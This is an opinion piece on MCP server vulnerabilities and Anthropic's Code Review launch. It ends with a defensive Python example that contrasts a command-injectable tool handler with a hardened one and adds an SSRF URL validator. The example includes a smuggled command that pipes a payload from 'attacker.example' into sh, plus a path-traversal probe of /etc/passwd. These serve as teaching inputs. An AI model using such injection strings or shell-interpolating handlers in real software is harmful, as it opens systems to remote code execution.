The MCP Security Debt: Anthropic Created the Ecosystem, the Vulnerability, and Now the Remedy — at Enterprise Scale
The Model Context Protocol (MCP) went from zero to more than 8,000 public servers in twelve months, driven largely by enterprise deployment of Anthropic's Claude Code. Security research on those servers reports that 36.7% are exposed to server-side request forgery (SSRF) and 43% to command execution, the predictable outcome of tool handlers that pass model-supplied arguments straight to a shell or an HTTP client. On the client side, Anthropic's own Claude Code carried CVE-2025-59536 (CVSS 8.7), a remote code execution flaw reachable through repository configuration files, meaning a malicious repository could execute code on the machine that opened it.

Anthropic launched Code Review on March 9, 2026, the same day as Copilot Cowork, as a multi-agent governance layer for AI-generated code. The pattern is hard to miss: Anthropic created the ecosystem (the MCP standard), shipped the vulnerability (the Claude Code CVE), and now sells the mitigation (Code Review), while the EU AI Act's August 2026 compliance deadline supplies the urgency that turns Code Review from optional tooling into a procurement requirement.

One distinction worth keeping in view when reading the numbers: the SSRF and command-execution figures describe the public MCP servers, most of which are third-party code, while the CVE is in Anthropic's client. A review layer for generated code is a different control from hardening the servers or patching the client, and a buyer should not assume one covers the other.
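The two server-side defect classes cited above, command execution and SSRF, as an added Python example. This is not code from the article, from Anthropic, or from any MCP project; it assumes a hypothetical server whose file tools are confined to a workspace root (`/srv/mcp-workspace`, an assumed path) and shows a naive `grep` tool handler beside a hardened one, plus the URL check a `fetch` tool needs. All inputs are constructed.

```python
"""Added example (not from the article, Anthropic, or any MCP project):
the two MCP server defect classes cited above, command execution and SSRF,
as a naive tool handler beside a hardened one. Inputs are constructed."""
import ipaddress
from pathlib import Path
from urllib.parse import urlparse

# Assumed root that file tools are confined to (hypothetical path).
WORKSPACE = Path("/srv/mcp-workspace").resolve()


# ---- Command execution ------------------------------------------------------
def grep_tool_vulnerable(pattern: str, path: str) -> str:
    """The naive pattern: model-supplied arguments are interpolated into a
    shell string destined for subprocess.run(cmd, shell=True). Returned
    rather than executed so the example runs safely; any ';', '|' or
    '$(...)' in the arguments becomes shell syntax."""
    return f"grep -n {pattern} {path}"


def grep_tool_hardened(pattern: str, path: str) -> list[str]:
    """Hardened form: build an argv list for subprocess.run(argv) with no
    shell, and confine `path` to WORKSPACE so '../' and absolute paths are
    rejected before anything runs."""
    target = (WORKSPACE / path).resolve()
    if not target.is_relative_to(WORKSPACE):
        raise ValueError(f"path escapes workspace: {path!r}")
    # '--' ends option parsing, so a pattern such as '-r' cannot become a flag.
    return ["grep", "-n", "--", pattern, str(target)]


# ---- SSRF -------------------------------------------------------------------
BLOCKED_HOSTS = {"localhost", "metadata.google.internal"}


def fetch_url_hardened(url: str) -> str:
    """Validate a URL a 'fetch' tool is asked to retrieve; return it unchanged
    if acceptable. Rejects non-HTTP schemes, well-known internal hostnames,
    and IP literals that are not globally routable (loopback, RFC 1918,
    link-local including 169.254.169.254, unspecified, reserved).
    Caveat: hostnames are not resolved here. A production check must also
    resolve the name, apply the same test to every returned address, and
    connect to that pinned address; otherwise DNS rebinding and non-canonical
    IP spellings such as '0x7f000001' or '127.1' slip through."""
    parts = urlparse(url)
    if parts.scheme not in ("http", "https"):
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    host = parts.hostname
    if not host:
        raise ValueError("missing host")
    if host.lower() in BLOCKED_HOSTS or host.lower().endswith(".internal"):
        raise ValueError(f"internal host: {host!r}")
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return url  # a DNS name: see the caveat above
    if not addr.is_global:
        raise ValueError(f"non-routable address: {addr}")
    return url


def rejects(fn, *args) -> bool:
    """True if fn(*args) raises ValueError; used to exercise the checks."""
    try:
        fn(*args)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    payload = "notes.txt; curl attacker.example | sh"
    print(grep_tool_vulnerable("TODO", payload))     # second command survives
    print(grep_tool_hardened("TODO", payload))       # one literal filename arg
    print(rejects(grep_tool_hardened, "x", "../../etc/passwd"))
    print(rejects(fetch_url_hardened, "http://169.254.169.254/latest/"))
    print(fetch_url_hardened("https://example.com/docs"))
```

The argv form makes the injected `; curl ... | sh` an inert part of one filename that `grep` will fail to open, which is the whole point: the fix is not to filter metacharacters but to never give tool input to a shell parser. The workspace check is what stops the same handler from becoming an arbitrary file read.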